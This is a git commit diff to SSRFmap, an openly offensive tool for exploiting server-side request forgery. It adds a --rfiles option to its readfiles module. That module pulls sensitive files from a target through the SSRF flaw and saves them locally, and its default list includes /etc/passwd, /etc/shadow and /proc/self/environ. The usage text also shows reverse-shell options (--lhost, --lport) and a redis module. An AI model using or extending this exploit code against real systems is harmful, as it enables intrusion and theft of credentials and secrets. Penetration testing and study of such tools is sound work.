Added the possibility to specify files via the --rflags parameter when using the readfiles module.

2021-02-02 19:34:38 -03:00 · 2021-02-02 19:34:38 -03:00 · 7055df6315
parent 3efa3e4175
commit 7055df6315
2 changed files with 15 additions and 5 deletions
--- a/modules/readfiles.py
+++ b/modules/readfiles.py
@ -1,6 +1,10 @@
 from core.utils import *
 import logging
 import os
+from argparse import ArgumentParser
+
+#parser.add_argument("-f", "--file", dest="filename",
+#                    help="write report to FILE", metavar="FILE")

 name          = "readfiles"
 description   = "Read files from the target"
@ -8,12 +12,13 @@ author        = "Swissky"
 documentation = []

 class exploit():
-    files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
-
+    
    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))
-
+        self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]   
+        
        r = requester.do_request(args.param, "")
+        
        if r != None:
            default = r.text

@ -36,3 +41,6 @@ class exploit():
                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
                    with open(directory + "/" + filename, 'w') as f:
                        f.write(diff)
+
+        else:
+            print("Empty response")
--- a/ssrfmap.py
+++ b/ssrfmap.py
@ -23,6 +23,7 @@ def parse_args():
    python ssrfmap.py -r data/request.txt -p url -m redis
    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
    '''
    parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
@ -32,10 +33,11 @@ def parse_args():
    parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
    parser.add_argument('--lhost', action ='store', dest='lhost',     help="LHOST reverse shell")
    parser.add_argument('--lport', action ='store', dest='lport',     help="LPORT reverse shell")
+    parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
    parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
    parser.add_argument('--ssl',   action ='store', dest='ssl',       help="Use HTTPS without verification", nargs='?', const=True)
    parser.add_argument('--level', action ='store', dest='level',     help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
-    results = parser.parse_args() 
+    results = parser.parse_args()
    
    if results.reqfile == None:
        parser.print_help()
@ -55,4 +57,4 @@ if __name__ == "__main__":

    # SSRFmap
    args = parse_args()
-    ssrf = SSRF(args)
+    ssrf = SSRF(args)